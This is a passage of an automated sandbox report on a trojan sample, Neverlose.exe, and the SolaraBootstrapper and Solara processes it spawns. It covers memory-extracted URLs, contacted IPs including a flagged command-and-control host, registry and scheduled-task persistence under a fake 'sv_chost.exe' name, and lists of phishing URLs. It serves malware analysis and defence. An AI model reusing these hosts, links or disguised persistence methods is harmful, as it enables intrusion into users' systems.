                  		unknown
                  https://github.githubassets.com/assets/ui_packages_updatable-content_updSolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_moduSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://resources.github.com/learn/pathwaysSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_jSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_jsSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/trendingSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://raw.githubusercontent.comSolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.1705141692.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1819250516.000001B380229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1933016695.0000024330789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2103914349.000002DC624E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2333807715.0000020499C69000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://github.com/solutions/industries/healthcareSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/assets/github-elements-221b0e7d77a3.jsSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://raw.githubusercontent.comSolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/enterprise/advanced-securitySolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.enigmaprotector.com/Neverlose.exe, 00000000.00000002.1727100048.0000000001008000.00000040.00000001.01000000.00000003.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-0e07cc183eed.jsSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.github.com/_private/browser/errorsSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/features/discussionsSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/topicsSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Button_Button_js-b0SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/enterprise/startupsSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.comSolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://partner.github.comSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/fluidicon.pngSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/favicons/favicon.pngSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.enigmaprotector.com/openUNeverlose.exe, 00000000.00000002.1727100048.0000000001008000.00000040.00000001.01000000.00000003.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://contoso.com/Licensepowershell.exe, 00000013.00000002.2505980870.00000204A9AAB000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://schemas.mic)powershell.exe, 0000000D.00000002.2060250567.0000024348C25000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/assets/light_tritanopia-fe4137b54b26.cssSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/assets/notifications-global-3ddac678adaf.jsSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/assets/app_assets_modules_github_onfocus_ts-ui_packages_trusted-typeSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://github.comSolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002ED1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/features/actionsSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/assets/dark-6b1e37da2254.cssSolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/assets/environment-4a62f2832289.jsSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/assets/error-add24e2c1056.cssSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_anchored-positSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://contoso.com/powershell.exe, 00000013.00000002.2505980870.00000204A9AAB000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://github.com/features/copilotSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_moduleSolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/assets/dark_high_contrast-f4daad25d8cf.cssSolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://crl.micft.cMicRosofpowershell.exe, 0000000D.00000002.2060250567.0000024348BC5000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/assets/light-efd2f2257c96.cssSolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_mSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/assets/behaviors-3b4c83250375.jsSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/assets/dark_tritanopia-1911f0cf0db4.cssSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.githubassets.com/assets/sessions-f096195f32d8.jsSolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1774478794.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002F84000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000002.1772665613.0000000002EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  185.199.109.133
                  		raw.githubusercontent.comNetherlands
                  		54113FASTLYUSfalse
                  147.185.221.22
                  		22.ip.gl.ply.ggUnited States
                  		12087SALSGIVERUStrue
                  140.82.121.4
                  		github.comUnited States
                  		36459GITHUBUSfalse

                  General Information

                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1498483
                  Start date and time:2024-08-24 21:54:06 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 8m 3s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:27
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:Neverlose.exe
                  Detection:MAL
                  Classification:mal100.troj.evad.winEXE@29/31@4/3
                  EGA Information:
                  • Successful, ratio: 23.1%
                  HCA Information:
                  • Successful, ratio: 71%
                  • Number of executed functions: 210
                  • Number of non-executed functions: 14
                  Cookbook Comments:
                  • Found application associated with file extension: .exe

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target Solara.exe, PID 7664 because it is empty
                  • Execution Graph export aborted for target Solara.exe, PID 7980 because it is empty
                  • Execution Graph export aborted for target SolaraBootstrapper.exe, PID 7200 because it is empty
                  • Execution Graph export aborted for target powershell.exe, PID 4312 because it is empty
                  • Execution Graph export aborted for target powershell.exe, PID 7388 because it is empty
                  • Execution Graph export aborted for target powershell.exe, PID 7832 because it is empty
                  • Execution Graph export aborted for target powershell.exe, PID 8064 because it is empty
                  • Execution Graph export aborted for target sv_chost.exe, PID 7460 because it is empty
                  • Execution Graph export aborted for target sv_chost.exe, PID 7624 because it is empty
                  • Execution Graph export aborted for target sv_chost.exe, PID 7780 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtCreateKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  15:54:58API Interceptor82x Sleep call for process: powershell.exe modified
                  15:55:04API Interceptor16x Sleep call for process: SolaraBootstrapper.exe modified
                  15:56:25API Interceptor26x Sleep call for process: Solara.exe modified
                  20:55:06AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Solara C:\Users\user\AppData\Local\Temp\Solara.exe
                  20:55:14AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Solara C:\Users\user\AppData\Local\Temp\Solara.exe
                  20:56:27Task SchedulerRun new task: sv_chost path: C:\Users\user\AppData\Roaming\sv_chost.exe
                  20:56:29AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run sv_chost C:\Users\user\AppData\Roaming\sv_chost.exe
                  20:56:37AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run sv_chost C:\Users\user\AppData\Roaming\sv_chost.exe
                  20:56:45AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sv_chost.lnk

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  185.199.109.133Electronic_Receipt_ATT0001.htmGet hashmaliciousHTMLPhisherBrowse
                    https://app.supercast.com/ahoy/messages/NuCwMXL7H9TYxRcbnPV2HNBC27R3XTJ7/click?signature=a81c8ff09c7aec0f320b61cbf7dd42e1a041100b&url=https://nursematte.com/asdbhewjcjfnjernfreddbecje/cloudflare-antibot#Kirsten.stevens+sueryder.orgGet hashmaliciousHTMLPhisherBrowse
                      https://email.kmotortraiesde.com/Get hashmaliciousUnknownBrowse
                        FlashUpdates.jsGet hashmaliciousUnknownBrowse
                          http://dineshramgovindaraj.github.io/netflixGet hashmaliciousUnknownBrowse
                            https://q68o.giantrype.com/8BSXIBCv/Get hashmaliciousTycoon2FABrowse
                              https://q68o.giantrype.com/8BSXIBCv/Get hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                l6UA0MG4eo.exeGet hashmaliciousUnknownBrowse
                                  V58VVR64wc.exeGet hashmaliciousUnknownBrowse
                                    Lhz7Qbbaap.exeGet hashmaliciousUnknownBrowse
                                      147.185.221.22Solara.exeGet hashmaliciousXWormBrowse
                                        XClient.exeGet hashmaliciousXWormBrowse
                                          dsjjzgRwZe.exeGet hashmaliciousNjratBrowse
                                            22.08.2024.exeGet hashmaliciousXmrigBrowse
                                              SolaraBootstrapper.exeGet hashmaliciousXWormBrowse
                                                140.82.121.4RfORrHIRNe.docGet hashmaliciousUnknownBrowse
                                                • github.com/ssbb36/stv/raw/main/5.mp3

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                raw.githubusercontent.comN8LgG4xO0F.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                • 185.199.111.133
                                                SecuriteInfo.com.Win64.Evo-gen.11830.19095.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                • 185.199.108.133
                                                FlashUpdates.jsGet hashmaliciousUnknownBrowse
                                                • 185.199.109.133
                                                1U34vTVJ97.pdfGet hashmaliciousUnknownBrowse
                                                • 185.199.110.133
                                                Ld0f3NDosJ.exeGet hashmaliciousUnknownBrowse
                                                • 185.199.108.133
                                                OD8uS0ksdv.exeGet hashmaliciousUnknownBrowse
                                                • 185.199.111.133
                                                OD8uS0ksdv.exeGet hashmaliciousUnknownBrowse
                                                • 185.199.108.133
                                                Y1e7n1NMkI.exeGet hashmaliciousCoinhiveBrowse
                                                • 185.199.110.133
                                                lEzFKwZJRA.exeGet hashmaliciousUnknownBrowse
                                                • 185.199.110.133
                                                PSZIOD9wM7.exeGet hashmaliciousLummaC, Go InjectorBrowse
                                                • 185.199.110.133
                                                github.comElectronic_Receipt_ATT0001.htmGet hashmaliciousHTMLPhisherBrowse
                                                • 140.82.121.3
                                                https://app.supercast.com/ahoy/messages/NuCwMXL7H9TYxRcbnPV2HNBC27R3XTJ7/click?signature=a81c8ff09c7aec0f320b61cbf7dd42e1a041100b&url=https://nursematte.com/asdbhewjcjfnjernfreddbecje/cloudflare-antibot#Kirsten.stevens+sueryder.orgGet hashmaliciousHTMLPhisherBrowse
                                                • 140.82.121.3
                                                5c683657-3d2b-5cd5-b372-9be474a3f97e.emlGet hashmaliciousUnknownBrowse
                                                • 140.82.112.3
                                                https://github.com/rakeshcorp/sandbox-samples.gitGet hashmaliciousUnknownBrowse
                                                • 140.82.121.4
                                                22.ip.gl.ply.ggSolara.exeGet hashmaliciousXWormBrowse
                                                • 147.185.221.22

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                FASTLYUSfile.exeGet hashmaliciousPython Stealer, Amadey, Cryptbot, Monster Stealer, PureLog Stealer, RedLine, SmokeLoaderBrowse
                                                • 185.199.111.133
                                                https://www.wita.org/wp-login.php?action=rp&key=WIXXf8mMVxmBCgiJjzdZ&login=lfair%40USChamber.comGet hashmaliciousUnknownBrowse
                                                • 151.101.195.9
                                                N8LgG4xO0F.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                • 185.199.111.133
                                                SecuriteInfo.com.Win64.Evo-gen.11830.19095.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                • 185.199.108.133
                                                http://janecreativetileimp.wordpress.com/Get hashmaliciousUnknownBrowse
                                                • 151.101.193.74
                                                https://view.officecloudenterprise.com/jwlswkeGet hashmaliciousUnknownBrowse
                                                • 151.101.66.137
                                                https://new-update-108047.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                • 151.101.129.46
                                                https://att-customer-service-109909.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                • 151.101.129.46
                                                https://7667lghjgfmank85387sg387sfyruk53k538gfm.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                • 151.101.129.46
                                                https://cathymanns101.wixsite.com/my-site-1Get hashmaliciousHTMLPhisherBrowse
                                                • 199.232.188.157
                                                GITHUBUSfile.exeGet hashmaliciousPython Stealer, Amadey, Cryptbot, Monster Stealer, PureLog Stealer, RedLine, SmokeLoaderBrowse
                                                • 140.82.121.3
                                                https://google-check.github.io/home/Get hashmaliciousUnknownBrowse
                                                • 140.82.112.18
                                                Electronic_Receipt_ATT0001.htmGet hashmaliciousHTMLPhisherBrowse
                                                • 140.82.121.3
